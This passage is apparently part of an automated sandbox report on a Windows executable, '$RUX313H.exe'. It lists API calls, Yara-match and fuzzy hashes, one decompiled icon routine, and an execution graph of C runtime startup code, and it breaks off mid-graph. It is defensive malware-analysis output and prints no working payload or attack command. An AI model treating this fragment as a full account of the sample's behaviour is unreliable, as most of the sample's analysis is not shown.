                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 022C0001, Relevance: 6.6, Strings: 5, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, Offset: 022C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_22c0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$@$@
                                                                          • API String ID: 0-496764042
                                                                          • Opcode ID: 9200def30268f1cf56faa0117a3e81abe0a1009fd11b6db9c2b073f9f54e804a
                                                                          • Instruction ID: 8c57b35e800ac8d1328f92d698b450aa27ee2b661ab8eb5e3352538070f332ca
                                                                          • Opcode Fuzzy Hash: 9200def30268f1cf56faa0117a3e81abe0a1009fd11b6db9c2b073f9f54e804a
                                                                          • Instruction Fuzzy Hash: 72D1028684E7C14FE313977028692957FB0AE23118F2F55DBC4C9DB0A3E26D994AC367
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B220, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                                          • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406520, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
				void _v32;
				void* _v40;
				void* _v48;
				void* _v52;
				void* _t17;
				void* _t20;
				struct _ICONINFO* _t23;

				_t9 = __eax;
				_t20 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
					E004064E4(__eax);
					_t9 = __edx;
					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
					if(__edx != 0) {
						GetIconInfo(__edx, _t23);
						GetObjectA(_v40, 0x18,  &_v32);
						 *(_t20 + 0x18) = _v40;
						_t17 = _v52;
						if(_t17 != 0) {
							DeleteObject(_t17);
						}
						_t9 = _v48;
						if(_t9 != 0) {
							return DeleteObject(_t9);
						}
					}
				}
				return _t9;
			}










                                                                          0x00406520
                                                                          0x00406527
                                                                          0x0040652c
                                                                          0x00406530
                                                                          0x00406535
                                                                          0x00406537
                                                                          0x0040653c
                                                                          0x00406540
                                                                          0x00406551
                                                                          0x0040655a
                                                                          0x0040655d
                                                                          0x00406563
                                                                          0x00406566
                                                                          0x00406566
                                                                          0x0040656b
                                                                          0x00406571
                                                                          0x00000000
                                                                          0x00406574
                                                                          0x00406571
                                                                          0x0040653c
                                                                          0x0040657e

                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                          • String ID:
                                                                          • API String ID: 3133107492-0
                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040FFB8, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                                          • GetIconInfo.USER32(?), ref: 0040FFD8
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                                          • DeleteObject.GDI32(?), ref: 0040FFFE
                                                                          • DeleteObject.GDI32(?), ref: 0041000C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                          • String ID:
                                                                          • API String ID: 3133107492-0
                                                                          • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                          • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                                          • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                          • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004105E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteIconInfoObject
                                                                          • String ID: ,k@
                                                                          • API String ID: 2689914137-1053005162
                                                                          • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                          • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                                          • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                          • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041133E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                                            • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                                            • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                          • String ID: open
                                                                          • API String ID: 2622400689-2758837156
                                                                          • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                          • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                                          • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                          • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: $RUX313H.exe PID: 6792 Parent PID: 6336 $RUX313H.exeCOMMON

                                                                          Execution Graph

                                                                          Execution Coverage:18.4%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:5.1%
                                                                          Total number of Nodes:884
                                                                          Total number of Limit Nodes:62

                                                                          Graph

                                                                          execution_graph 19362 df124b 19402 df24d8 19362->19402 19364 df1250 ___lock_fhandle 19406 df26bb GetStartupInfoW 19364->19406 19366 df1266 19408 df1eba GetProcessHeap 19366->19408 19368 df12be 19369 df12c9 19368->19369 19512 df13a5 19368->19512 19409 df191d 19369->19409 19372 df12cf 19373 df12da __RTC_Initialize 19372->19373 19374 df13a5 _fast_error_exit 69 API calls 19372->19374 19430 df1ecf 19373->19430 19374->19373 19376 df12e9 19377 df12f5 GetCommandLineA 19376->19377 19378 df13a5 _fast_error_exit 69 API calls 19376->19378 19449 df25b2 GetEnvironmentStringsW 19377->19449 19380 df12f4 19378->19380 19380->19377 19384 df131a 19473 df23aa 19384->19473 19388 df132b 19489 df1a32 19388->19489 19389 df19f8 __lock 69 API calls 19389->19388 19391 df1333 19392 df133e 19391->19392 19393 df19f8 __lock 69 API calls 19391->19393 19495 df2992 19392->19495 19393->19392 19398 df1361 19527 df1a23 19398->19527 19401 df1366 ___lock_fhandle 19403 df24fb 19402->19403 19404 df2508 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19402->19404 19403->19404 19405 df24ff 19403->19405 19404->19405 19405->19364 19407 df26d1 19406->19407 19407->19366 19408->19368 19530 df1ad7 RtlEncodePointer 19409->19530 19411 df1922 19536 df2dbc 19411->19536 19414 df192b 19540 df1993 19414->19540 19419 df1948 19552 df2e3e 19419->19552 19422 df198a 19423 df1993 __mtterm 72 API calls 19422->19423 19425 df198f 19423->19425 19425->19372 19426 df1969 19426->19422 19427 df196f 19426->19427 19561 df186a 19427->19561 19429 df1977 GetCurrentThreadId 19429->19372 19431 df1edb ___lock_fhandle 19430->19431 19432 df2c8d __lock 69 API calls 19431->19432 19433 df1ee2 19432->19433 19434 df2e3e __calloc_crt 69 API calls 19433->19434 19436 df1ef3 19434->19436 19435 df1f5e GetStartupInfoW 19444 df209c 19435->19444 19446 df1f73 19435->19446 19436->19435 19437 df1efe ___lock_fhandle @_EH4_CallFilterFunc@8 19436->19437 19437->19376 19438 df2160 19832 df2174 19438->19832 19440 df20e5 GetStdHandle 19440->19444 19441 df2e3e __calloc_crt 69 API calls 19441->19446 19442 df20f7 GetFileType 19442->19444 19443 df1fc1 19443->19444 19447 df1ff3 GetFileType 19443->19447 19448 df2001 InitializeCriticalSectionAndSpinCount 19443->19448 19444->19438 19444->19440 19444->19442 19445 df2124 InitializeCriticalSectionAndSpinCount 19444->19445 19445->19444 19446->19441 19446->19443 19446->19444 19447->19443 19447->19448 19448->19443 19450 df25c5 WideCharToMultiByte 19449->19450 19454 df1305 19449->19454 19452 df262f FreeEnvironmentStringsW 19450->19452 19453 df25f8 19450->19453 19452->19454 19455 df2e88 __malloc_crt 69 API calls 19453->19455 19462 df217d 19454->19462 19456 df25fe 19455->19456 19456->19452 19457 df2605 WideCharToMultiByte 19456->19457 19458 df261b 19457->19458 19459 df2624 FreeEnvironmentStringsW 19457->19459 19460 df2e06 _free 69 API calls 19458->19460 19459->19454 19461 df2621 19460->19461 19461->19459 19463 df218b 19462->19463 19464 df2190 GetModuleFileNameA 19462->19464 19842 df3269 19463->19842 19466 df21bd 19464->19466 19836 df222e 19466->19836 19468 df130f 19468->19384 19520 df19f8 19468->19520 19470 df2e88 __malloc_crt 69 API calls 19471 df21f6 19470->19471 19471->19468 19472 df222e _parse_cmdline 79 API calls 19471->19472 19472->19468 19474 df23b3 19473->19474 19478 df23b8 _strlen 19473->19478 19475 df3269 ___initmbctable 95 API calls 19474->19475 19475->19478 19476 df1320 19476->19388 19476->19389 19477 df2e3e __calloc_crt 69 API calls 19479 df23ee _strlen 19477->19479 19478->19476 19478->19477 19479->19476 19481 df2e3e __calloc_crt 69 API calls 19479->19481 19482 df2440 19479->19482 19483 df2467 19479->19483 19486 df247e 19479->19486 20290 df486e 19479->20290 19480 df2e06 _free 69 API calls 19480->19476 19481->19479 19482->19480 19484 df2e06 _free 69 API calls 19483->19484 19484->19476 19487 df3b5f __invoke_watson 8 API calls 19486->19487 19488 df248a 19487->19488 19491 df1a3e __IsNonwritableInCurrentImage 19489->19491 20299 df3e9b 19491->20299 19492 df1a5c __initterm_e 19494 df1a7d __IsNonwritableInCurrentImage 19492->19494 20302 df3e86 19492->20302 19494->19391 19496 df299e 19495->19496 19498 df29a3 19495->19498 19497 df3269 ___initmbctable 95 API calls 19496->19497 19497->19498 19499 df1344 19498->19499 19500 df4858 _parse_cmdline 79 API calls 19498->19500 19501 df1140 LoadLibraryW GetProcAddress 19499->19501 19500->19498 19502 df116c 19501->19502 19503 df11c7 CorBindToRuntimeEx 19501->19503 19502->19503 19504 df11e6 19502->19504 19503->19504 20367 df1010 6 API calls 19504->20367 19506 df121f 19507 df1010 12 API calls 19506->19507 19508 df1233 19507->19508 19508->19398 19509 df1c8e 19508->19509 20372 df1b5f 19509->20372 19511 df1c9d 19511->19398 19513 df13b6 19512->19513 19514 df13b1 19512->19514 19516 df1cff __NMSG_WRITE 69 API calls 19513->19516 19515 df1ca2 __FF_MSGBANNER 69 API calls 19514->19515 19515->19513 19517 df13be 19516->19517 19518 df19e2 _doexit 4 API calls 19517->19518 19519 df13c8 19518->19519 19519->19369 19521 df1ca2 __FF_MSGBANNER 69 API calls 19520->19521 19522 df1a00 19521->19522 19523 df1cff __NMSG_WRITE 69 API calls 19522->19523 19524 df1a08 19523->19524 20399 df1ac3 19524->20399 19528 df1b5f _doexit 69 API calls 19527->19528 19529 df1a2e 19528->19529 19529->19401 19573 df3ee0 19530->19573 19532 df1ae8 __init_pointers __initp_misc_winsig 19574 df2c7c EncodePointer 19532->19574 19534 df1b06 30 API calls 19534->19411 19537 df2dc8 19536->19537 19538 df2dce InitializeCriticalSectionAndSpinCount 19537->19538 19539 df1927 19537->19539 19538->19537 19539->19414 19549 df263d 19539->19549 19541 df199d 19540->19541 19543 df19a3 19540->19543 19575 df265b 19541->19575 19544 df2cd7 DeleteCriticalSection 19543->19544 19545 df2cf3 19543->19545 19578 df2e06 19544->19578 19547 df2cff DeleteCriticalSection 19545->19547 19548 df1930 19545->19548 19547->19545 19548->19372 19550 df193d 19549->19550 19551 df2654 TlsAlloc 19549->19551 19550->19414 19550->19419 19554 df2e45 19552->19554 19555 df1955 19554->19555 19556 df2e63 Sleep 19554->19556 19604 df4a43 19554->19604 19555->19422 19558 df2699 19555->19558 19557 df2e7a 19556->19557 19557->19554 19557->19555 19559 df26b3 TlsSetValue 19558->19559 19560 df26af 19558->19560 19559->19426 19560->19426 19562 df1876 ___lock_fhandle 19561->19562 19614 df2c8d 19562->19614 19564 df18b3 InterlockedIncrement 19621 df190b 19564->19621 19567 df2c8d __lock 68 API calls 19568 df18d4 19567->19568 19624 df2f1d InterlockedIncrement 19568->19624 19570 df18f2 19636 df1914 19570->19636 19572 df18ff ___lock_fhandle 19572->19429 19573->19532 19574->19534 19576 df266e 19575->19576 19577 df2672 TlsFree 19575->19577 19576->19543 19577->19543 19579 df2e0f HeapFree 19578->19579 19580 df2e38 _free 19578->19580 19579->19580 19581 df2e24 19579->19581 19580->19543 19584 df3bbe 19581->19584 19587 df17fb GetLastError 19584->19587 19586 df2e2a GetLastError 19586->19580 19601 df267a 19587->19601 19589 df1810 19590 df185e SetLastError 19589->19590 19591 df2e3e __calloc_crt 66 API calls 19589->19591 19590->19586 19592 df1823 19591->19592 19592->19590 19593 df2699 __getptd_noexit TlsSetValue 19592->19593 19594 df1837 19593->19594 19595 df183d 19594->19595 19596 df1855 19594->19596 19597 df186a __getptd_noexit 66 API calls 19595->19597 19598 df2e06 _free 66 API calls 19596->19598 19599 df1845 GetCurrentThreadId 19597->19599 19600 df185b 19598->19600 19599->19590 19600->19590 19602 df268d 19601->19602 19603 df2691 TlsGetValue 19601->19603 19602->19589 19603->19589 19605 df4a4e 19604->19605 19610 df4a69 19604->19610 19606 df4a5a 19605->19606 19605->19610 19608 df3bbe _free 68 API calls 19606->19608 19607 df4a79 HeapAlloc 19609 df4a5f 19607->19609 19607->19610 19608->19609 19609->19554 19610->19607 19610->19609 19612 df3eba DecodePointer 19610->19612 19613 df3ecd 19612->19613 19613->19610 19615 df2c9e 19614->19615 19616 df2cb1 EnterCriticalSection 19614->19616 19639 df2d15 19615->19639 19616->19564 19618 df2ca4 19618->19616 19619 df19f8 __lock 68 API calls 19618->19619 19620 df2cb0 19619->19620 19620->19616 19830 df2df1 LeaveCriticalSection 19621->19830 19623 df18cd 19623->19567 19625 df2f3a 19624->19625 19626 df2f35 InterlockedIncrement 19624->19626 19627 df2f47 19625->19627 19628 df2f44 InterlockedIncrement 19625->19628 19626->19625 19629 df2f4d InterlockedIncrement 19627->19629 19630 df2f52 19627->19630 19628->19627 19629->19630 19631 df2f5c InterlockedIncrement 19630->19631 19633 df2f5f 19630->19633 19631->19633 19632 df2f76 InterlockedIncrement 19632->19633 19633->19632 19634 df2f9a InterlockedIncrement 19633->19634 19635 df2f89 InterlockedIncrement 19633->19635 19634->19570 19635->19633 19831 df2df1 LeaveCriticalSection 19636->19831 19638 df191b 19638->19572 19640 df2d21 ___lock_fhandle 19639->19640 19654 df2d40 19640->19654 19660 df1ca2 19640->19660 19646 df2d62 ___lock_fhandle 19646->19618 19647 df2d5d 19650 df3bbe _free 68 API calls 19647->19650 19648 df2d6c 19651 df2c8d __lock 68 API calls 19648->19651 19649 df2d36 19699 df19e2 19649->19699 19650->19646 19653 df2d73 19651->19653 19655 df2d97 19653->19655 19656 df2d82 InitializeCriticalSectionAndSpinCount 19653->19656 19654->19646 19702 df2e88 19654->19702 19658 df2e06 _free 68 API calls 19655->19658 19657 df2d9d 19656->19657 19708 df2db3 19657->19708 19658->19657 19711 df2498 19660->19711 19662 df1ca9 19663 df1cb6 19662->19663 19664 df2498 __NMSG_WRITE 69 API calls 19662->19664 19665 df1cff __NMSG_WRITE 69 API calls 19663->19665 19667 df1cd8 19663->19667 19664->19663 19666 df1cce 19665->19666 19668 df1cff __NMSG_WRITE 69 API calls 19666->19668 19669 df1cff 19667->19669 19668->19667 19670 df1d1d __NMSG_WRITE 19669->19670 19671 df2498 __NMSG_WRITE 66 API calls 19670->19671 19698 df1e44 19670->19698 19673 df1d30 19671->19673 19675 df1e49 GetStdHandle 19673->19675 19676 df2498 __NMSG_WRITE 66 API calls 19673->19676 19674 df1ead 19674->19649 19679 df1e57 _strlen 19675->19679 19675->19698 19677 df1d41 19676->19677 19677->19675 19678 df1d53 19677->19678 19678->19698 19741 df4227 19678->19741 19681 df1e90 WriteFile 19679->19681 19679->19698 19681->19698 19683 df1eaf 19686 df3b5f __invoke_watson 8 API calls 19683->19686 19684 df1d80 GetModuleFileNameW 19685 df1da0 19684->19685 19689 df1db0 __NMSG_WRITE 19684->19689 19687 df4227 __NMSG_WRITE 66 API calls 19685->19687 19688 df1eb9 19686->19688 19687->19689 19689->19683 19690 df1df6 19689->19690 19750 df429c 19689->19750 19690->19683 19759 df41bb 19690->19759 19694 df41bb __NMSG_WRITE 66 API calls 19695 df1e2d 19694->19695 19695->19683 19696 df1e34 19695->19696 19768 df435a EncodePointer 19696->19768 19793 df123c 19698->19793 19808 df19b0 GetModuleHandleExW 19699->19808 19705 df2e96 19702->19705 19704 df2d56 19704->19647 19704->19648 19705->19704 19706 df2ea9 Sleep 19705->19706 19812 df4906 19705->19812 19707 df2ec2 19706->19707 19707->19704 19707->19705 19829 df2df1 LeaveCriticalSection 19708->19829 19710 df2dba 19710->19646 19712 df24a2 19711->19712 19713 df24ac 19712->19713 19714 df3bbe _free 69 API calls 19712->19714 19713->19662 19715 df24c8 19714->19715 19718 df3b4f 19715->19718 19721 df3b24 DecodePointer 19718->19721 19722 df3b37 19721->19722 19727 df3b5f IsProcessorFeaturePresent 19722->19727 19725 df3b24 __fclose_nolock 8 API calls 19726 df24d3 19725->19726 19726->19662 19728 df3b6a 19727->19728 19733 df39f4 19728->19733 19732 df3b4e 19732->19725 19734 df3a0e ___raise_securityfailure _memset 19733->19734 19735 df3a2e IsDebuggerPresent 19734->19735 19736 df297c ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 19735->19736 19739 df3af2 ___raise_securityfailure 19736->19739 19737 df123c __NMSG_WRITE 6 API calls 19738 df3b15 19737->19738 19740 df2967 GetCurrentProcess TerminateProcess 19738->19740 19739->19737 19740->19732 19742 df4240 19741->19742 19743 df4232 19741->19743 19744 df3bbe _free 69 API calls 19742->19744 19743->19742 19746 df4259 19743->19746 19749 df424a 19744->19749 19745 df3b4f __fclose_nolock 9 API calls 19747 df1d73 19745->19747 19746->19747 19748 df3bbe _free 69 API calls 19746->19748 19747->19683 19747->19684 19748->19749 19749->19745 19754 df42aa 19750->19754 19751 df42ae 19752 df3bbe _free 69 API calls 19751->19752 19753 df42b3 19751->19753 19755 df42de 19752->19755 19753->19690 19754->19751 19754->19753 19757 df42ed 19754->19757 19756 df3b4f __fclose_nolock 9 API calls 19755->19756 19756->19753 19757->19753 19758 df3bbe _free 69 API calls 19757->19758 19758->19755 19760 df41d5 19759->19760 19761 df41c7 19759->19761 19762 df3bbe _free 69 API calls 19760->19762 19761->19760 19766 df4201 19761->19766 19763 df41df 19762->19763 19764 df3b4f __fclose_nolock 9 API calls 19763->19764 19765 df1e16 19764->19765 19765->19683 19765->19694 19766->19765 19767 df3bbe _free 69 API calls 19766->19767 19767->19763 19769 df438e ___crtMessageBoxW 19768->19769 19770 df439d LoadLibraryExW 19769->19770 19771 df444b IsDebuggerPresent 19769->19771 19772 df43d8 GetProcAddress 19770->19772 19773 df43b4 GetLastError 19770->19773 19774 df4455 19771->19774 19775 df4470 19771->19775 19780 df43ec 7 API calls 19772->19780 19781 df4468 19772->19781 19779 df43c3 LoadLibraryW 19773->19779 19773->19781 19776 df445c OutputDebugStringW 19774->19776 19777 df4463 19774->19777 19775->19777 19778 df4475 DecodePointer 19775->19778 19776->19777 19777->19781 19782 df44b4 19777->19782 19787 df449c DecodePointer DecodePointer 19777->19787 19778->19781 19779->19772 19779->19781 19783 df4448 19780->19783 19784 df4434 GetProcAddress EncodePointer 19780->19784 19785 df123c __NMSG_WRITE 6 API calls 19781->19785 19786 df44ec DecodePointer 19782->19786 19792 df44d8 DecodePointer 19782->19792 19783->19771 19784->19783 19788 df453a 19785->19788 19790 df44f3 19786->19790 19786->19792 19787->19782 19788->19698 19791 df4504 DecodePointer 19790->19791 19790->19792 19791->19792 19792->19781 19794 df1246 IsProcessorFeaturePresent 19793->19794 19795 df1244 19793->19795 19797 df141d 19794->19797 19795->19674 19800 df13cc IsDebuggerPresent 19797->19800 19801 df13e1 ___raise_securityfailure 19800->19801 19806 df297c SetUnhandledExceptionFilter UnhandledExceptionFilter 19801->19806 19803 df13e9 ___raise_securityfailure 19807 df2967 GetCurrentProcess TerminateProcess 19803->19807 19805 df1406 19805->19674 19806->19803 19807->19805 19809 df19c9 GetProcAddress 19808->19809 19810 df19e0 ExitProcess 19808->19810 19809->19810 19811 df19db CorExitProcess 19809->19811 19811->19810 19813 df4981 19812->19813 19817 df4912 19812->19817 19814 df3eba __calloc_impl DecodePointer 19813->19814 19815 df4987 19814->19815 19818 df3bbe _free 68 API calls 19815->19818 19816 df491d 19816->19817 19819 df1ca2 __FF_MSGBANNER 68 API calls 19816->19819 19822 df1cff __NMSG_WRITE 68 API calls 19816->19822 19826 df19e2 _doexit 4 API calls 19816->19826 19817->19816 19820 df4945 RtlAllocateHeap 19817->19820 19823 df496d 19817->19823 19824 df3eba __calloc_impl DecodePointer 19817->19824 19827 df496b 19817->19827 19821 df4979 19818->19821 19819->19816 19820->19817 19820->19821 19821->19705 19822->19816 19825 df3bbe _free 68 API calls 19823->19825 19824->19817 19825->19827 19826->19816 19828 df3bbe _free 68 API calls 19827->19828 19828->19821 19829->19710 19830->19623 19831->19638 19835 df2df1 LeaveCriticalSection 19832->19835 19834 df217b 19834->19437 19835->19834 19838 df2250 19836->19838 19841 df22b4 19838->19841 19846 df4858 19838->19846 19839 df21d3 19839->19468 19839->19470 19840 df4858 _parse_cmdline 79 API calls 19840->19841 19841->19839 19841->19840 19843 df3279 19842->19843 19844 df3272 19842->19844 19843->19464 20172 df3651 19844->20172 19849 df4802 19846->19849 19852 df3287 19849->19852 19853 df3298 19852->19853 19856 df32e5 19852->19856 19860 df17e3 19853->19860 19856->19838 19857 df32c6 19857->19856 19880 df35ac 19857->19880 19861 df17fb __getptd_noexit 69 API calls 19860->19861 19862 